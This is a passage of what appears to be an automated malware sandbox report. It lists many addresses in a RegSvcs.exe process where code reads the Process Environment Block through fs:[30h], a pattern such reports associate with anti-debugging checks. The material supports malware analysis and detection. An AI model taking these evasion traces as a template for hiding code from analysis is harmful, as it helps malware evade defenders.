Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A2349 mov eax, dword ptr fs:[00000030h]	10_2_014A2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]	10_2_014A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]	10_2_014A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]	10_2_014A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A035C mov ecx, dword ptr fs:[00000030h]	10_2_014A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]	10_2_014A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A035C mov eax, dword ptr fs:[00000030h]	10_2_014A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EA352 mov eax, dword ptr fs:[00000030h]	10_2_014EA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C8350 mov ecx, dword ptr fs:[00000030h]	10_2_014C8350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C437C mov eax, dword ptr fs:[00000030h]	10_2_014C437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A30B mov eax, dword ptr fs:[00000030h]	10_2_0145A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A30B mov eax, dword ptr fs:[00000030h]	10_2_0145A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A30B mov eax, dword ptr fs:[00000030h]	10_2_0145A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141C310 mov ecx, dword ptr fs:[00000030h]	10_2_0141C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01440310 mov ecx, dword ptr fs:[00000030h]	10_2_01440310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014DC3CD mov eax, dword ptr fs:[00000030h]	10_2_014DC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0142A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0142A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0142A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0142A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0142A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A3C0 mov eax, dword ptr fs:[00000030h]	10_2_0142A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]	10_2_014283C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]	10_2_014283C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]	10_2_014283C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014283C0 mov eax, dword ptr fs:[00000030h]	10_2_014283C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A63C0 mov eax, dword ptr fs:[00000030h]	10_2_014A63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE3DB mov eax, dword ptr fs:[00000030h]	10_2_014CE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE3DB mov eax, dword ptr fs:[00000030h]	10_2_014CE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE3DB mov ecx, dword ptr fs:[00000030h]	10_2_014CE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CE3DB mov eax, dword ptr fs:[00000030h]	10_2_014CE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C43D4 mov eax, dword ptr fs:[00000030h]	10_2_014C43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C43D4 mov eax, dword ptr fs:[00000030h]	10_2_014C43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014303E9 mov eax, dword ptr fs:[00000030h]	10_2_014303E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0143E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0143E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0143E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014563FF mov eax, dword ptr fs:[00000030h]	10_2_014563FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141E388 mov eax, dword ptr fs:[00000030h]	10_2_0141E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141E388 mov eax, dword ptr fs:[00000030h]	10_2_0141E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141E388 mov eax, dword ptr fs:[00000030h]	10_2_0141E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144438F mov eax, dword ptr fs:[00000030h]	10_2_0144438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144438F mov eax, dword ptr fs:[00000030h]	10_2_0144438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01418397 mov eax, dword ptr fs:[00000030h]	10_2_01418397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01418397 mov eax, dword ptr fs:[00000030h]	10_2_01418397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01418397 mov eax, dword ptr fs:[00000030h]	10_2_01418397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A8243 mov eax, dword ptr fs:[00000030h]	10_2_014A8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A8243 mov ecx, dword ptr fs:[00000030h]	10_2_014A8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141A250 mov eax, dword ptr fs:[00000030h]	10_2_0141A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01426259 mov eax, dword ptr fs:[00000030h]	10_2_01426259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01424260 mov eax, dword ptr fs:[00000030h]	10_2_01424260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01424260 mov eax, dword ptr fs:[00000030h]	10_2_01424260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01424260 mov eax, dword ptr fs:[00000030h]	10_2_01424260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141826B mov eax, dword ptr fs:[00000030h]	10_2_0141826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0274 mov eax, dword ptr fs:[00000030h]	10_2_014D0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141823B mov eax, dword ptr fs:[00000030h]	10_2_0141823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0142A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0142A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0142A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0142A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0142A2C3 mov eax, dword ptr fs:[00000030h]	10_2_0142A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014302E1 mov eax, dword ptr fs:[00000030h]	10_2_014302E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014302E1 mov eax, dword ptr fs:[00000030h]	10_2_014302E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014302E1 mov eax, dword ptr fs:[00000030h]	10_2_014302E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E284 mov eax, dword ptr fs:[00000030h]	10_2_0145E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E284 mov eax, dword ptr fs:[00000030h]	10_2_0145E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A0283 mov eax, dword ptr fs:[00000030h]	10_2_014A0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A0283 mov eax, dword ptr fs:[00000030h]	10_2_014A0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A0283 mov eax, dword ptr fs:[00000030h]	10_2_014A0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014302A0 mov eax, dword ptr fs:[00000030h]	10_2_014302A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014302A0 mov eax, dword ptr fs:[00000030h]	10_2_014302A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]	10_2_014B62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B62A0 mov ecx, dword ptr fs:[00000030h]	10_2_014B62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]	10_2_014B62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]	10_2_014B62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]	10_2_014B62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B62A0 mov eax, dword ptr fs:[00000030h]	10_2_014B62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428550 mov eax, dword ptr fs:[00000030h]	10_2_01428550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01428550 mov eax, dword ptr fs:[00000030h]	10_2_01428550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145656A mov eax, dword ptr fs:[00000030h]	10_2_0145656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145656A mov eax, dword ptr fs:[00000030h]	10_2_0145656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145656A mov eax, dword ptr fs:[00000030h]	10_2_0145656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014B6500 mov eax, dword ptr fs:[00000030h]	10_2_014B6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]	10_2_014F4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]	10_2_014F4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]	10_2_014F4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]	10_2_014F4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]	10_2_014F4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]	10_2_014F4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014F4500 mov eax, dword ptr fs:[00000030h]	10_2_014F4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]	10_2_01430535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]	10_2_01430535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]	10_2_01430535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]	10_2_01430535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]	10_2_01430535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430535 mov eax, dword ptr fs:[00000030h]	10_2_01430535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]	10_2_0144E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]	10_2_0144E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]	10_2_0144E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]	10_2_0144E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E53E mov eax, dword ptr fs:[00000030h]	10_2_0144E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E5CF mov eax, dword ptr fs:[00000030h]	10_2_0145E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E5CF mov eax, dword ptr fs:[00000030h]	10_2_0145E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014265D0 mov eax, dword ptr fs:[00000030h]	10_2_014265D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A5D0 mov eax, dword ptr fs:[00000030h]	10_2_0145A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145A5D0 mov eax, dword ptr fs:[00000030h]	10_2_0145A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014225E0 mov eax, dword ptr fs:[00000030h]	10_2_014225E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144E5E7 mov eax, dword ptr fs:[00000030h]	10_2_0144E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C5ED mov eax, dword ptr fs:[00000030h]	10_2_0145C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145C5ED mov eax, dword ptr fs:[00000030h]	10_2_0145C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01422582 mov eax, dword ptr fs:[00000030h]	10_2_01422582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01422582 mov ecx, dword ptr fs:[00000030h]	10_2_01422582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01454588 mov eax, dword ptr fs:[00000030h]	10_2_01454588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E59C mov eax, dword ptr fs:[00000030h]	10_2_0145E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A05A7 mov eax, dword ptr fs:[00000030h]	10_2_014A05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A05A7 mov eax, dword ptr fs:[00000030h]	10_2_014A05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A05A7 mov eax, dword ptr fs:[00000030h]	10_2_014A05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014445B1 mov eax, dword ptr fs:[00000030h]	10_2_014445B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014445B1 mov eax, dword ptr fs:[00000030h]	10_2_014445B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0145E443 mov eax, dword ptr fs:[00000030h]	10_2_0145E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141645D mov eax, dword ptr fs:[00000030h]	10_2_0141645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144245A mov eax, dword ptr fs:[00000030h]	10_2_0144245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AC460 mov ecx, dword ptr fs:[00000030h]	10_2_014AC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144A470 mov eax, dword ptr fs:[00000030h]	10_2_0144A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144A470 mov eax, dword ptr fs:[00000030h]	10_2_0144A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144A470 mov eax, dword ptr fs:[00000030h]	10_2_0144A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01458402 mov eax, dword ptr fs:[00000030h]	10_2_01458402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01458402 mov eax, dword ptr fs:[00000030h]	10_2_01458402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01458402 mov eax, dword ptr fs:[00000030h]	10_2_01458402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141E420 mov eax, dword ptr fs:[00000030h]	10_2_0141E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141E420 mov eax, dword ptr fs:[00000030h]	10_2_0141E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141E420 mov eax, dword ptr fs:[00000030h]	10_2_0141E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141C427 mov eax, dword ptr fs:[00000030h]	10_2_0141C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]	10_2_014A6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]	10_2_014A6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]	10_2_014A6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A6420 mov eax, dword ptr fs:[00000030h]	10_2_014A6420
